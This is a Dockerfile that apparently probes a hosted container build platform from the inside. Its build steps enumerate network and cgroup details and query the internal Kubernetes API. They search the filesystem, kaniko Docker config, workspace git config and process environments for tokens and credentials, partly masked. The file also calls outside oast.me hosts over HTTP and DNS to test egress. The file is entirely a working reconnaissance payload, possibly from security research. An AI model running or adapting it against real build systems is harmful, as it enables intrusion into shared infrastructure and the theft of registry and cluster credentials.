FROM alpine:3.19
RUN apk add --no-cache curl iproute2 bind-tools >/dev/null 2>&1 || echo APK_INSTALL_FAILED; true
RUN echo "===NET==="; ip addr 2>&1 | grep -E 'inet |mtu'; echo "--cgroup--"; cat /proc/1/cgroup 2>&1 | head; echo "--hostname--"; hostname; echo "--resolv--"; cat /etc/resolv.conf 2>&1; echo "--k8s-dns--"; getent hosts kubernetes.default.svc 2>&1; getent hosts kubernetes.default.svc.cluster.local 2>&1; true
RUN echo "===K8S-API==="; curl -sk --max-time 5 https://kubernetes.default.svc/api 2>&1 | head -c 300; echo; curl -sk --max-time 5 https://100.64.0.1/api 2>&1 | head -c 200; echo K8SAPI_DONE; true
RUN echo "===KANIKO-DIR==="; ls -la /kaniko 2>&1 | head -40; echo "--kaniko docker cfg--"; ls -la /kaniko/.docker 2>&1; echo "--cfg content (redacted)--"; cat /kaniko/.docker/config.json 2>&1 | sed -E 's/("(auth|password|identitytoken|registrytoken)":[[:space:]]*")[^"]+/\1<REDACTED>/g' | head -c 1200; echo; true
RUN echo "===FS-SECRETS==="; ls -la / 2>&1; echo "--/run,/root,/etc/kubernetes,/var/run/secrets--"; ls -la /run /root /etc/kubernetes /var/run/secrets 2>&1; echo "--docker configs--"; find / -maxdepth 5 -name 'config.json' -path '*docker*' 2>/dev/null | head; find / -maxdepth 4 \( -iname '*token*' -o -iname '*credential*' -o -iname 'kubeconfig' -o -iname '.dockercfg' \) 2>/dev/null | grep -viE '^/proc|^/sys|^/usr/lib|^/usr/share|^/lib' | head -40; true
RUN echo "===WORKSPACE==="; ls -la /.app_platform_workspace 2>&1 | head; echo "--git creds in clone--"; cat /.app_platform_workspace/.git/config 2>&1 | sed -E 's#(https?://)[^@/]+@#\1<REDACTED>@#g'; find /.app_platform_workspace/.git -iname '*cred*' 2>/dev/null; true
RUN echo "===PROC-ENVIRON==="; for p in 1 $(ls /proc 2>/dev/null | grep -E '^[0-9]+$' | head -20); do echo "-- pid $p --"; tr '\0' '\n' < /proc/$p/environ 2>/dev/null | sed -E 's/(TOKEN|KEY|SECRET|PASSWORD|AUTH|CRED)=.*/\1=<REDACTED>/' | grep -iE 'DO_|DIGITALOCEAN|REGISTRY|DOCKER|AWS|KUBE|TOKEN|SECRET|BUILD' | head; done 2>&1 | head -60; true
RUN echo "===MOUNTS==="; cat /proc/mounts 2>&1 | grep -iE 'secret|token|kube|registry|docker|kaniko|workspace' | head; echo "--id--"; id; true
RUN echo "===OOB==="; curl -s --max-time 8 http://http-d9dc6oh71vvet3ar33rg94urm9zg156fy.oast.me/build-egress-v2 2>&1 | head -c 80; echo; getent hosts dns-d9dc6oh71vvet3ar33rg94urm9zg156fy.oast.me 2>&1; nslookup ns-d9dc6oh71vvet3ar33rg94urm9zg156fy.oast.me 2>&1 | tail -4; echo OOB_DONE; true
RUN echo "===ENV-FINAL==="; env | sed -E 's/(TOKEN|KEY|SECRET|PASSWORD|PASSWD|AUTH|CRED)=.*/\1=<REDACTED>/' | sort; echo ALLDONE; true
CMD ["sleep","1800"]
